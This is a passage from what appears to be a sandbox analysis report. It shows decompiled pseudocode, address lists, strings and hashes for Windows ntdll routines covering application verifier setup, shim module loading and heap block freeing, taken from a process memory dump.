				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x32985d8c; // 0x2552ce0
				_t8 = _t69 + 0x30; // 0x2551d08
				L3291EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E32919429(_t115) >= 0) {
					_t130 =  *0x32985240; // 0x0
					while(1) {
						__eflags = _t130 - 0x32985240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E3291919C(_t97, _t130, 0x32985240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E32918B5E(_t71);
					_t108 = 0x32861b88;
					_t128 = E328AF380(0x32861b88, 0, _t97,  &_v20, _t97);
					__eflags = _t128;
					if(_t128 < 0) {
						__eflags = _t128 - 0xc0000135;
						if(_t128 != 0xc0000135) {
							goto L49;
						}
						_t131 =  *0x32985278; // 0x0
						L15:
						_t76 = L328ACF00(_t108, 0, _t131, 0x32861b90, 0,  &_v16, 1, _v0);
						L328C1D66(_t108, 0, 0);
						__eflags = _t76;
						if(_t76 >= 0) {
							_t88 =  *0x7ffe0330;
							_t108 = _t88 & 0x0000001f;
							__eflags = _t88 & 0x0000001f;
							asm("ror eax, cl");
							 *0x32989238 = _t88 ^ _v16;
							 *0x32989230 = 1;
						}
						 *0x32989231 = 1;
						 *0x32989232 = 1;
						E3291964A(L328C1D66(_t108, 0, 1));
						_t124 =  *0x32985240; // 0x0
						_t97 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t124 - 0x32985240;
							if(_t124 == 0x32985240) {
								break;
							}
							_v30 = _t97;
							_t128 = E328B1934( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x10)) + 0x50)), 0,  &_v30);
							__eflags = _t128;
							if(_t128 < 0) {
								goto L49;
							}
							_t124 =  *_t124;
						}
						__eflags =  *0x329869dc & 0x00000008;
						if(( *0x329869dc & 0x00000008) != 0) {
							_push("AVRF: -*- final list of providers -*- \n");
							E32918EB8(E3288B910());
						}
						E32919818();
						E3289E580(3,  *((intOrPtr*)(_v12 + 8)), _t97, _t97,  &_v28);
						goto L25;
					}
					_t108 = _v20;
					_t131 =  *((intOrPtr*)(_v20 + 0x18));
					E328AD3E1(_t97, _v20,  *((intOrPtr*)(_v20 + 0x18)));
					goto L15;
				} else {
					_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
					_t92 =  *0x32985d8c; // 0x2552ce0
					_t10 = _t92 + 0x30; // 0x2551d08
					L3291EF10(0x5d, 0, "AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.\n",  *_t10);
					_t128 = 0xc0000001;
					 *( *[fs:0x30] + 0x68) =  *( *[fs:0x30] + 0x68) & 0xfffffeff;
					goto L49;
				}
			}

0x32918633
0x32918633
0x32918642
0x32918644
0x32918648
0x3291864d
0x32918654
0x32918658
0x3291865c
0x32918661
0x32918663
0x32918861
0x32918864
0x32918866
0x32918872
0x32918877
0x3291887e
0x32918886
0x3291888b
0x3291888f
0x32918891
0x32918893
0x32918893
0x32918880
0x32918880
0x32918880
0x3291889b
0x329188a2
0x329188ac
0x329188ac
0x00000000
0x329188a4
0x329188a4
0x329188a6
0x00000000
0x00000000
0x329188a8
0x329188b1
0x329188b1
0x329188b6
0x329188bb
0x329188c2
0x329188c4
0x329188ef
0x329188ef
0x329188f4
0x329188f6
0x329188f6
0x329188fc
0x329188fc
0x329188fe
0x32918900
0x32918902
0x32918915
0x32918915
0x3291892b
0x32918943
0x32918943
0x32918948
0x3291895f
0x32918961
0x32918963
0x32918965
0x32918970
0x32918972
0x32918974
0x32918978
0x32918982
0x32918987
0x32918987
0x32918974
0x3291898c
0x32918994
0x32918994
0x329188d6
0x329188db
0x329188df
0x329188e1
0x329188ea
0x00000000
0x329188ea
0x329188e3
0x00000000
0x329188e3
0x329188a2
0x32918868
0x00000000
0x32918868
0x3291866c
0x3291885a
0x3291885a
0x00000000
0x3291885a
0x3291867e
0x32918684
0x3291868f
0x32918693
0x00000000
0x00000000
0x329186a0
0x3291883f
0x32918850
0x32918852
0x32918854
0x00000000
0x00000000
0x00000000
0x32918854
0x329186a6
0x329186b2
0x329186b5
0x329186ba
0x329186c5
0x329186d4
0x32918719
0x3291872e
0x3291872e
0x32918730
0x00000000
0x00000000
0x32918723
0x32918728
0x3291872a
0x3291875e
0x00000000
0x3291872c
0x3291872c
0x00000000
0x3291872c
0x3291872a
0x32918732
0x32918740
0x3291874a
0x3291874c
0x3291874e
0x32918768
0x3291876e
0x00000000
0x00000000
0x32918774
0x3291877a
0x3291878e
0x32918797
0x3291879c
0x3291879e
0x329187a0
0x329187ab
0x329187ab
0x329187ae
0x329187b0
0x329187b5
0x329187b5
0x329187bc
0x329187c2
0x329187cd
0x329187d2
0x329187d8
0x329187d8
0x329187da
0x329187da
0x329187e0
0x00000000
0x00000000
0x329187ec
0x329187f8
0x329187fa
0x329187fc
0x00000000
0x00000000
0x32918802
0x32918802
0x32918806
0x3291880d
0x3291880f
0x3291881a
0x3291881a
0x3291881f
0x32918834
0x00000000
0x32918834
0x32918750
0x32918754
0x32918757
0x00000000
0x329186d6
0x329186dc
0x329186df
0x329186e4
0x329186ef
0x329186fd
0x32918711
0x00000000
0x32918711

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 329186BD
VerifierDlls, xrefs: 3291893D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 329186E7
VerifierDebug, xrefs: 32918925
HandleTraces, xrefs: 3291890F
AVRF: -*- final list of providers -*- , xrefs: 3291880F
VerifierFlags, xrefs: 329188D0

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 986f2fef7ec7e91301062af66699fa35ee842464e68cbd630f3925228aa5e1a6
Instruction ID: 1b407f76664fe1e3cbf8dd738fc66a658879add65ed52217529715e0c1d829ee
Opcode Fuzzy Hash: 986f2fef7ec7e91301062af66699fa35ee842464e68cbd630f3925228aa5e1a6
Instruction Fuzzy Hash: AA915575545359AFF311CF299880B2AB7A8BF40718F4908D8FA906B351CB78BC09DB92

Uniqueness

Uniqueness Score: -1.00%

Function 328B237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E328B237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x329838b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x329868d8; // 0x0
						if(_t22 != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x329868d8 = _t50;
							 *0x32985d4c = _t50;
						}
					}
					 *0x329838b8 = _t38;
					return _t55;
				}
				_t59 =  *0x329868d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x329838b8 = 0;
					_t55 = E32911BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x329868d8; // 0x0
						while( *_t51 != 0) {
							 *0x329891e0(_t51, 0, 1, 1, 0, 1, "true");
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x32989218; // 0x0
						_push("true");
						_v12 = _t30;
						_pop(_t45);
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E3289FED0(0x329832d8);
						if( *0x329865f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E32886704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x329832d8);
						E3289E740(_t46);
						goto L21;
					}
					_t36 =  *0x329837c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E3290E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x329837c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}

0x328b2383
0x328b238b
0x328b238d
0x328b2390
0x328b2393
0x328b2397
0x328b23a5
0x328b23a8
0x328b23aa
0x328b23b1
0x328fa878
0x328fa87d
0x328fa883
0x328fa883
0x328b23b1
0x328b23ba
0x328b23c3
0x328b23c3
0x328b2399
0x328b239f
0x328fa784
0x328fa78f
0x328fa793
0x328fa7cd
0x328fa80b
0x328fa7e3
0x328fa7e9
0x328fa7ee
0x328fa866
0x328fa85f
0x328fa85f
0x00000000
0x328fa85f
0x328fa7f0
0x328fa7f2
0x328fa7f2
0x328fa7f5
0x328fa7f5
0x328fa7f8
0x328fa7fb
0x328fa808
0x328fa808
0x328fa812
0x328fa817
0x328fa81d
0x328fa81f
0x328fa825
0x328fa826
0x328fa82d
0x328fa82f
0x328fa83b
0x328fa83d
0x328fa849
0x328fa850
0x328fa850
0x328fa849
0x328fa855
0x328fa85a
0x00000000
0x328fa85a
0x328fa795
0x328fa79c
0x328fa7b4
0x328fa7b9
0x328fa7be
0x328fa7c3
0x328fa7c5
0x328fa7c5
0x328fa7c6
0x328fa7c6
0x00000000

Strings

apphelp.dll, xrefs: 328B2382
LdrpDynamicShimModule, xrefs: 328FA7A5
minkernel\ntdll\ldrinit.c, xrefs: 328FA7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 328FA79F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 15723949f3f5cbc1445ad4ddef2162651bc4243fc3c436f11c230ed519d835a8
Instruction ID: 8e8943fe298a6a721cf7791cd35368dc370ceeb8176f31e603308ea07ae6c14a
Opcode Fuzzy Hash: 15723949f3f5cbc1445ad4ddef2162651bc4243fc3c436f11c230ed519d835a8
Instruction Fuzzy Hash: 7B31287DA44204BFF7149F58CC80EA977B8EF84B24F184469E908BB350DAB19882CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3288F113 Relevance: 8.2, Strings: 6, Instructions: 684
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E3288F113(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v68;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t242;
				signed char _t243;
				signed short _t245;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				intOrPtr _t255;
				signed int _t265;
				signed int _t274;
				signed int _t277;
				intOrPtr _t278;
				signed int _t279;
				signed int _t302;
				signed short _t308;
				intOrPtr _t312;
				signed int _t323;
				signed int _t328;
				signed int _t331;
				intOrPtr _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				intOrPtr _t341;
				intOrPtr _t350;
				signed int _t354;
				signed int _t357;
				intOrPtr _t358;
				signed int _t359;
				signed int _t378;
				signed short _t386;
				intOrPtr _t388;
				intOrPtr _t399;
				unsigned int _t415;
				signed int _t424;
				signed int _t427;
				signed int _t431;
				signed int _t439;
				signed short _t440;
				signed short _t443;
				signed int _t447;
				signed short* _t453;
				void* _t461;
				signed int _t472;
				signed int _t473;
				signed int _t475;
				intOrPtr _t476;
				signed int _t483;
				void* _t485;
				signed short _t496;
				unsigned int _t502;
				unsigned int _t504;
				signed int _t509;
				signed int _t514;
				signed short* _t524;
				signed int _t535;
				signed int _t537;
				signed int _t540;
				unsigned int _t545;
				signed int _t547;

				_t444 = __ecx;
				_t547 = __ecx;
				_t533 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x32986d48) != 0) {
					_push(_a4);
					_t509 = __edx;
					L11:
					_t242 = E328A0B10(_t444, _t509);
					L7:
					return _t242;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x240)) =  *((intOrPtr*)(__ecx + 0x240)) - 1;
						_t424 = E3288F858(__edx,  &_v12,  &_v16);
						__eflags = _t424;
						if(_t424 != 0) {
							_t135 = _t547 + 0x244;
							 *_t135 =  *(_t547 + 0x244) - _v16;
							__eflags =  *_t135;
						}
					}
					_t439 = _a4;
					_t509 = _t533;
					_v44 = _t533;
					L14:
					_t243 =  *((intOrPtr*)(_t533 + 6));
					__eflags = _t243;
					if(_t243 == 0) {
						_t535 = _t547;
					} else {
						_t535 = (_t533 & 0xffff0000) - ((_t243 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t535;
					}
					_t245 = 7 + _t439 * 8 + _t509;
					_v12 = _t245;
					__eflags =  *_t245 - 3;
					if( *_t245 == 3) {
						_v16 = _t509 + _t439 * 8 + 8;
						E32889E69(_t547, _t509 + _t439 * 8 + 8);
						_t496 = _v16;
						_v28 =  *(_t496 + 0x10);
						 *((intOrPtr*)(_t535 + 0x30)) =  *((intOrPtr*)(_t535 + 0x30)) - 1;
						_v36 =  *(_t496 + 0x14);
						 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) - ( *(_t496 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) +  *(_t496 + 0x14);
						 *((intOrPtr*)(_t547 + 0x208)) =  *((intOrPtr*)(_t547 + 0x208)) - 1;
						_t415 =  *(_t496 + 0x14);
						__eflags = _t415 - 0x7f000;
						if(_t415 >= 0x7f000) {
							 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t415;
							_t415 =  *(_t496 + 0x14);
						}
						_t509 = _v44;
						_t439 = _t439 + (_t415 >> 3) + 0x20;
						__eflags = 1;
						_a4 = _t439;
						_v40 = 1;
					} else {
						_v36 = _v36 & 0x00000000;
					}
					__eflags =  *((intOrPtr*)(_t547 + 0x54)) -  *((intOrPtr*)(_t509 + 4));
					if( *((intOrPtr*)(_t547 + 0x54)) ==  *((intOrPtr*)(_t509 + 4))) {
						_v48 = _t509;
						_t247 = E3288BF92(_t535, _t509);
						__eflags = _a8;
						_v32 = _t247;
						if(_a8 != 0) {
							__eflags = _t247;
							if(_t247 == 0) {
								goto L20;
							}
						}
						__eflags =  *0x32986960 - 1;
						if( *0x32986960 >= 1) {
							__eflags = _t247;
							if(_t247 == 0) {
								_t399 =  *[fs:0x30];
								__eflags =  *(_t399 + 0xc);
								if( *(_t399 + 0xc) == 0) {
									_push("HEAP: ");
									E3288B910();
								} else {
									E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E3288B910();
								__eflags =  *0x32985da8;
								if( *0x32985da8 == 0) {
									__eflags = 0;
									L3294FC95(_t439, 1, _t535, 0);
								}
								_t509 = _v44;
								_t439 = _a4;
							}
						}
						_t334 = _v40;
						_t472 = _t439 << 3;
						_v20 = _t472;
						_t473 = _t472 + _t509;
						_v24 = _t473;
						__eflags = _t334;
						if(_t334 == 0) {
							_t473 = _t473 + 0xfffffff0;
						}
						_t475 = (_t473 & 0xfffff000) - _v48;
						__eflags = _t475;
						_v52 = _t475;
						if(_t475 == 0) {
							__eflags =  *0x32986960 - 1;
							if( *0x32986960 < 1) {
								goto L9;
							}
							__eflags = _t334;
							L147:
							if(__eflags == 0) {
								goto L9;
							}
							_t255 =  *[fs:0x30];
							__eflags =  *(_t255 + 0xc);
							if( *(_t255 + 0xc) == 0) {
								_push("HEAP: ");
								E3288B910();
							} else {
								E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E3288B910();
							__eflags =  *0x32985da8;
							if( *0x32985da8 == 0) {
								__eflags = 0;
								L3294FC95(_t439, 1, _t535, 0);
							}
							goto L153;
						} else {
							_t336 = E3288FABA( &_v48,  &_v52, 0x4000);
							__eflags = _t336;
							if(_t336 < 0) {
								L90:
								 *((intOrPtr*)(_t547 + 0x220)) =  *((intOrPtr*)(_t547 + 0x220)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									L154:
									_t509 = _v44;
									L9:
									_t444 = _t547;
									L10:
									_push(_t439);
									goto L11;
								}
								E328A096B(_t547, _t535, _v28 + 0xffffffe8, _v36, _v44,  &_a4);
								L153:
								_t439 = _a4;
								goto L154;
							}
							_t337 = L328A3C40();
							_t441 = 0x7ffe0380;
							__eflags = _t337;
							if(_t337 != 0) {
								_t340 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t340 = 0x7ffe0380;
							}
							__eflags =  *_t340;
							if( *_t340 != 0) {
								_t341 =  *[fs:0x30];
								__eflags =  *(_t341 + 0x240) & 0x00000001;
								if(( *(_t341 + 0x240) & 0x00000001) != 0) {
									E3294F13E(_t441, _t547, _v48, _v52, 5);
								}
							}
							_t342 = _v32;
							 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
							_t476 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t476 - 0x7f000;
							if(_t476 >= 0x7f000) {
								 *(_t547 + 0x1fc) =  *(_t547 + 0x1fc) - _t476;
							}
							E32889E69(_t547, _t342);
							_t478 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E3288B9F6(_t547, _t478);
							 *((intOrPtr*)(_t535 + 0x2c)) =  *((intOrPtr*)(_t535 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t547 + 0x1f8)) =  *((intOrPtr*)(_t547 + 0x1f8)) - _v52;
							_t350 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t350 - 0x7f000;
							if(_t350 >= 0x7f000) {
								_t123 = _t547 + 0x1fc;
								 *_t123 =  *(_t547 + 0x1fc) + _t350;
								__eflags =  *_t123;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t524 = _v52 + _v48;
								_v32 = _t524;
								_t524[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v24 - _v52 + _v48;
								if(_v24 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t524[1] = _t524[1] ^ _t524[0] ^  *_t524;
										 *_t524 =  *_t524 ^  *(_t547 + 0x50);
									}
								} else {
									_t443 = 0;
									_t524[3] = 0;
									_t524[1] = 0;
									_t378 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t483 = _t378;
									 *_t524 = _t378;
									__eflags =  *0x32986960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t483 - 1;
										if(_t483 <= 1) {
											_t388 =  *[fs:0x30];
											__eflags =  *(_t388 + 0xc);
											if( *(_t388 + 0xc) == 0) {
												_push("HEAP: ");
												E3288B910();
											} else {
												E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E3288B910();
											__eflags =  *0x32985da8 - _t443; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												L3294FC95(_t443, 1, _t535, 0);
											}
											_t524 = _v32;
										}
									}
									_t524[1] = _t443;
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t386 = (_t524 - _t535 >> 0x10) + 1;
										_v16 = _t386;
										__eflags = _t386 - 0xfe;
										if(_t386 >= 0xfe) {
											_push(_t443);
											_push(_t443);
											_push(_t535);
											_push(_t524);
											_t485 = 3;
											L32955FED(_t485,  *((intOrPtr*)(_t535 + 0x18)));
											_t524 = _v48;
											_t386 = _v32;
										}
										_t443 = _t386;
									}
									_t524[3] = _t443;
									E328A0B10(_t547, _t524,  *_t524 & 0x0000ffff);
									_t441 = 0x7ffe0380;
								}
							}
							_t354 = L328A3C40();
							__eflags = _t354;
							if(_t354 != 0) {
								_t357 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t357 = _t441;
							}
							__eflags =  *_t357;
							if( *_t357 != 0) {
								_t358 =  *[fs:0x30];
								__eflags =  *(_t358 + 0x240) & 1;
								if(( *(_t358 + 0x240) & 1) != 0) {
									__eflags = L328A3C40();
									if(__eflags != 0) {
										_t441 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3294F058(_t441, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _v40, _v36,  *_t441 & 0x000000ff);
								}
							}
							_t359 = L328A3C40();
							_t540 = 0x7ffe038a;
							_t440 = 0x230;
							__eflags = _t359;
							if(_t359 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 != 0) {
								__eflags = L328A3C40();
								if(__eflags != 0) {
									_t540 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t440;
									__eflags = _t540;
								}
								_push( *_t540 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								L123:
								_push( *(_t547 + 0x74) << 3);
								_push(_v52);
								_t242 = E3294F058(_t440, _t547, _v48, __eflags);
							}
							goto L7;
						}
					}
					L20:
					_t447 = _t509 + 0x0000101f & 0xfffff000;
					_v48 = _t447;
					__eflags = _t447 - _t509 + 0x28;
					if(_t447 == _t509 + 0x28) {
						_t447 = _t447 + 0x1000;
						_v48 = _t447;
					}
					_t250 = _t439 << 3;
					_v24 = _t250;
					_t251 = _t250 + _t509;
					__eflags = _v40;
					_v20 = _t251;
					if(_v40 == 0) {
						_t251 = _t251 + 0xfffffff0;
					}
					_t252 = _t251 & 0xfffff000;
					__eflags = _t252 - _t447;
					if(_t252 < _t447) {
						__eflags =  *0x32986960 - 1; // 0x0
						if(__eflags < 0) {
							goto L9;
						}
						__eflags = _v40;
						goto L147;
					}
					_t265 = _t252 - _t447;
					__eflags = _a8;
					_v52 = _t265;
					if(_a8 != 0) {
						L25:
						__eflags = _t265;
						if(_t265 == 0) {
							L31:
							_t440 = 0;
							__eflags = _v40;
							if(_v40 == 0) {
								_t453 = _v48 + _v52;
								_v36 = _t453;
								_t453[2] =  *((intOrPtr*)(_t547 + 0x54));
								__eflags = _v20 - _v52 + _v48;
								if(_v20 == _v52 + _v48) {
									__eflags =  *(_t547 + 0x4c);
									if( *(_t547 + 0x4c) != 0) {
										_t453[1] = _t453[1] ^ _t453[0] ^  *_t453;
										 *_t453 =  *_t453 ^  *(_t547 + 0x50);
									}
								} else {
									_t453[3] = 0;
									_t453[1] = 0;
									_t302 = _v24 - _v52 - _v48 + _t509 >> 0x00000003 & 0x0000ffff;
									_t514 = _t302;
									 *_t453 = _t302;
									__eflags =  *0x32986960 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t514 - 1;
										if(_t514 <= 1) {
											_t312 =  *[fs:0x30];
											__eflags =  *(_t312 + 0xc);
											if( *(_t312 + 0xc) == 0) {
												_push("HEAP: ");
												E3288B910();
											} else {
												E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("(LONG)FreeEntry->Size > 1");
											E3288B910();
											__eflags =  *0x32985da8 - _t440; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												L3294FC95(_t440, 1, _t535, 0);
											}
											_t453 = _v36;
										}
									}
									_t453[1] = _t440;
									_t515 =  *((intOrPtr*)(_t535 + 0x18));
									__eflags =  *((intOrPtr*)(_t535 + 0x18)) - _t535;
									if( *((intOrPtr*)(_t535 + 0x18)) != _t535) {
										_t308 = (_t453 - _t535 >> 0x10) + 1;
										_v12 = _t308;
										__eflags = _t308 - 0xfe;
										if(_t308 >= 0xfe) {
											_push(_t440);
											_push(_t440);
											_push(_t535);
											_push(_t453);
											_t461 = 3;
											L32955FED(_t461, _t515);
											_t453 = _v52;
											_t308 = _v28;
										}
									} else {
										_t308 = _t440;
									}
									_t453[3] = _t308;
									E328A0B10(_t547, _t453,  *_t453 & 0x0000ffff);
								}
							}
							E328A096B(_t547, _t535, _v48 + 0xffffffe8, _v52, _v44,  &_v8);
							E328A0B10(_t547, _v60, _v24);
							_t274 = L328A3C40();
							_t536 = 0x7ffe0380;
							__eflags = _t274;
							if(_t274 != 0) {
								_t277 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t277 = 0x7ffe0380;
							}
							__eflags =  *_t277;
							if( *_t277 != 0) {
								_t278 =  *[fs:0x30];
								__eflags =  *(_t278 + 0x240) & 1;
								if(( *(_t278 + 0x240) & 1) != 0) {
									__eflags = L328A3C40();
									if(__eflags != 0) {
										_t536 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E3294F058(_t440, _t547, _v48, __eflags, _v52,  *(_t547 + 0x74) << 3, _t440, _t440,  *_t536 & 0x000000ff);
								}
							}
							_t279 = L328A3C40();
							_t537 = 0x7ffe038a;
							__eflags = _t279;
							if(_t279 != 0) {
								_t242 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t242 = 0x7ffe038a;
							}
							__eflags =  *_t242;
							if( *_t242 == 0) {
								goto L7;
							} else {
								__eflags = L328A3C40();
								if(__eflags != 0) {
									_t537 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t537;
								}
								_push( *_t537 & 0x000000ff);
								_push(_t440);
								_push(_t440);
								goto L123;
							}
						}
						 *((intOrPtr*)(_t547 + 0x210)) =  *((intOrPtr*)(_t547 + 0x210)) + 1;
						_t323 = E3288FABA( &_v48,  &_v52, 0x4000);
						__eflags = _t323;
						if(_t323 < 0) {
							goto L90;
						}
						_t328 = L328A3C40();
						__eflags = _t328;
						if(_t328 != 0) {
							_t331 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t331 = 0x7ffe0380;
						}
						__eflags =  *_t331;
						if( *_t331 != 0) {
							_t332 =  *[fs:0x30];
							__eflags =  *(_t332 + 0x240) & 1;
							if(( *(_t332 + 0x240) & 1) != 0) {
								E3294F13E(_t439, _t547, _v48, _v52, 6);
							}
						}
						_t509 = _v44;
						goto L31;
					}
					__eflags =  *_v12 - 3;
					if( *_v12 != 3) {
						__eflags = _t265;
						if(_t265 == 0) {
							goto L9;
						}
						__eflags = _t265 -  *((intOrPtr*)(_t547 + 0x6c));
						if(_t265 >=  *((intOrPtr*)(_t547 + 0x6c))) {
							goto L25;
						} else {
							goto L9;
						}
					}
					goto L25;
				}
				_t439 = _a4;
				if(_t439 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t509 = __edx;
					goto L10;
				}
				_t427 =  *((intOrPtr*)(__ecx + 0x74)) + _t439;
				_v20 = _t427;
				if(_t427 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1f8) >>  *((intOrPtr*)(__ecx + 0x250)) + 3) {
					_t509 = _t533;
					goto L9;
				} else {
					_t431 = E328A1EB2(__ecx, __edx,  &_a4, 0);
					_t439 = _a4;
					_t509 = _t431;
					_v52 = _t509;
					if(_t439 - 0x201 > 0xfbff) {
						goto L14;
					} else {
